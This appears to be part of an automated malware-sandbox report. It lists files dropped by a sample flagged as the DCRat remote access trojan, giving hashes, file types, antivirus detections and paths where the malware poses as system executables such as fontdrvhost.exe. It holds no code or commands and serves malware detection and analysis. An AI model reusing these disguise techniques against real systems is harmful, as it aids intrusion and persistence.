                                                                                          SSDEEP:12:4jXofsebBuHskvwp0M3J592C1AqByNVi/vnFQEHh:8XQsiBpkvwp0gJ5wqBy7i/9QEB
                                                                                          MD5:4E76FBA96DF31DA23555CE718E996AB5
                                                                                          SHA1:0555D4EA2DD5A27E83AB9EEC060E35B8D8FF4EC0
                                                                                          SHA-256:244033D6A6A3149873BA6F748D10D23FEE2ECF6374B962440BF7A6EAC1102090
                                                                                          SHA-512:BF894FD1F41741CEE1E611477F7C89FBAB5B9CC67C0BE9B037D2EC811F9CDC0BA8AD8F19361B584A984752B0F9261ABA448C68F7512F43DFA33779D9F7EF6E8E
                                                                                          Malicious:false
                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb47aeb41, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                          Category:dropped
                                                                                          Size (bytes):1048576
                                                                                          Entropy (8bit):0.9433828666010293
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:TSB2ESB2SSjlK/ZvxPXK0I9XGJCTgzZYkr3g16zV2UPkLk+kY+lKuy9ny5zPOZ15:TazaHvxXy2V2UR
                                                                                          MD5:8BAF60F7BBF547D99337EC872650D0AE
                                                                                          SHA1:703801967E164F880B6AC615A37833E4138500EB
                                                                                          SHA-256:42047CB41C88F0BCE6980007CF9599F4E7ADF224C9E5DF8D098B0CB3CD23A23E
                                                                                          SHA-512:E908BE70541DEBC8AFE9B248D2DCE9F7E916A4E60721C5198782CAB59124191468FFEC5AA1ADC3997F8161F0B778E9D6D1DB52495FF972CCE2A5E083EB60087C
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\fontdrvhost.exe, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):376
                                                                                          Entropy (8bit):5.854471858430727
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:CncgHl5nXmko4Wfr1kuURWWRa5spSfjsKwu4zFshE7qzARxU8F9nz0DXzOF9XF7+:CDHnX/o4YOuIPRDsjvwRCi7qzASC543L
                                                                                          MD5:A12CF9D1D8620E46DA8A7501AD729A62
                                                                                          SHA1:ADD7C6C76ED689FA595B4035C018FD8CFD2CD620
                                                                                          SHA-256:0C0F76B64A5AC18CB1AF2393EB868E53BC609CB7AF3E865B316D8658F73FA504
                                                                                          SHA-512:85122F86979E90EAE3D193CE939F7621D6BFC4F550948F4F77E7CC5D4995453FF4796B8E82107B013CA4839FCF85B52B4C3AA7D0AF7BAFF1E4E0BCC3641AD746
                                                                                          Malicious:false
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):903680
                                                                                          Entropy (8bit):5.346245125656977
                                                                                          Encrypted:false
                                                                                          SSDEEP:12288:Sey1d7N520G7/XsQcJ4/VADlK3Yogh4DrJgDmkAkZeR+HjYIAWCKCwxuEPY4rPva:SJZMjsNoVrWXuehAVfmG66t
                                                                                          MD5:02E08842C25F66B1FFE53CE0F50F1758
                                                                                          SHA1:A5D1E71B9E6484A5EBC555DD41A5450909387CB2
                                                                                          SHA-256:EB3FF36D945D22D68D24690566115EAC07C6666154EC18DD37527673375E41FA
                                                                                          SHA-512:807A3A8C5A223F843989FF1488198C7700A0E1AD779B7E055CE93AD44FEF24C62A4025325621EE7B402CB771584EC847E9CB63177BEE8672B31B3C7F6F5B5DB3
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                                                          Process:C:\Program Files (x86)\Windows Mail\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1281
                                                                                          Entropy (8bit):5.370111951859942
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                          Process:C:\Users\user\Desktop\Wh2c6sgwRo.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2045
                                                                                          Entropy (8bit):5.3618187964722885
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKjJHiYHKGSI6oQHZHitHTHhAHKKkrHKoLHqHpHNpv:iq+wmj0qVCYqGSI6oQ5CtzHeqKkrqoLA
                                                                                          MD5:2880333ECF0A1010436F3B458AE3D931
                                                                                          SHA1:77BD788B221FEDAAC26D7822C9C129CAD7E8D9D9
                                                                                          SHA-256:1473EDC44F2DA62769AFFE97BD0E7882B48F9A4EA8325286DE80E2F27306592F
                                                                                          SHA-512:A2E1CBFE3D2CB2EF87217AEEB8504AF0D9247BC83FFC1B1BE3DBFCE32968CE1BDFE4637B50C7B4F744F52EABE8738F2D33207A70F61E75ADDB5B84724EEE6467
                                                                                          Malicious:true
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..2,"System.Web.Extensions, Version=4.0.0.0, Culture=
                                                                                          Process:C:\Users\user\AppData\Local\Temp\d3yngi1q.wji.exe
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):1830
                                                                                          Entropy (8bit):5.3661116947161815
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                                                                          MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                                                                          SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                                                                          SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                                                                          SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                          Process:C:\ProgramData\fontdrvhost.exe
                                                                                          File Type:CSV text
                                                                                          Category:dropped
                                                                                          Size (bytes):1281
                                                                                          Entropy (8bit):5.370111951859942
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                          MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                          SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                          SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                          SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                          Malicious:false
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):64
                                                                                          Entropy (8bit):1.1940658735648508
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:NlllulxmH/lZ:NllUg
                                                                                          MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                                                          SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                                                          SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                                                          SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                                                          Malicious:false
                                                                                          Preview:@...e................................. ..............@..........
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                          Category:dropped
                                                                                          Size (bytes):114688
                                                                                          Entropy (8bit):0.9746603542602881
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                          Category:dropped
                                                                                          Size (bytes):196608
                                                                                          Entropy (8bit):1.1209886597424439
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                                                          MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                                                          SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                                                          SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                                                          SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1358696453229276
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):106496
                                                                                          Entropy (8bit):1.1373607036346451
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                                          MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                                          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                                          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                                          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.8475592208333753
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                                                          MD5:BE99679A2B018331EACD3A1B680E3757
                                                                                          SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                                                          SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                                                          SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                                                          Malicious:false
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                          Category:dropped
                                                                                          Size (bytes):20480
                                                                                          Entropy (8bit):0.5707520969659783
                                                                                          Encrypted:false
                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):49152
                                                                                          Entropy (8bit):0.8180424350137764
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                          Malicious:false
                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d0, 10 symbols, created Tue Dec 10 08:22:27 2024, 1st section name ".debug$S"
                                                                                          Category:dropped
                                                                                          Size (bytes):1928
                                                                                          Entropy (8bit):4.616514247912043
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:HoK9AUaLzNZyQNHVwKRmNSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ecN:qUaLzqQNWKRmslmuulB+hnqXSfbNtmh7
                                                                                          MD5:9A7191E535FDB1075534404636082210
                                                                                          SHA1:2C6B474545FA7673C52428335E618EA909E1D55E
                                                                                          SHA-256:4401DED9F2FF9439C8D952D34D0D5CA151D901DDF4E99A07B0BCE37CA698880E
                                                                                          SHA-512:9E04C64437B8E804F7E8324313F2E46D1431C066888AA9F140E17EC8B292F65B753D91BC8803B121B68782855F34B60888F46FE2BF70C38ED3C7D41D418E670D
                                                                                          Malicious:false
                                                                                          Preview:L...C.Wg.............debug$S........X...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSCA62F8F92906C4C64B352C63DFBD9F59.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES459B.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.
                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Tue Dec 10 08:22:27 2024, 1st section name ".debug$S"
                                                                                          Category:dropped
                                                                                          Size (bytes):1952
                                                                                          Entropy (8bit):4.56007003034987
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:HgbW96XOIbjHzfwKRmNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:xUj0KRmEluOulajfqXSfbNtmh5Z
                                                                                          MD5:1F626A8A711786B60DC859C075C690D7
                                                                                          SHA1:61D5AE6ECDEE51CFF00A180A99CBEBF8760E36E6
                                                                                          SHA-256:5BA31F8B8FBD54FE51DB9A9AD35D80660B1DFB9F0B6CC272EFEB11DEF623AC02
                                                                                          SHA-512:21F5DE834643FED1A134ABCD2DEAEFCA08975E7AAA69230F033ADAF612700BB461D3ED525A72C9CBF1C8AF82F9FE93D811B387AE242D68207EEF3E31EE763F67
                                                                                          Malicious:false
                                                                                          Preview:L...C.Wg.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSC533681BDB06443E789816E6615DEB19.TMP..................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES4770.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.
                                                                                          Process:C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                          Category:dropped
                                                                                          Size (bytes):40960
                                                                                          Entropy (8bit):0.8553638852307782
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
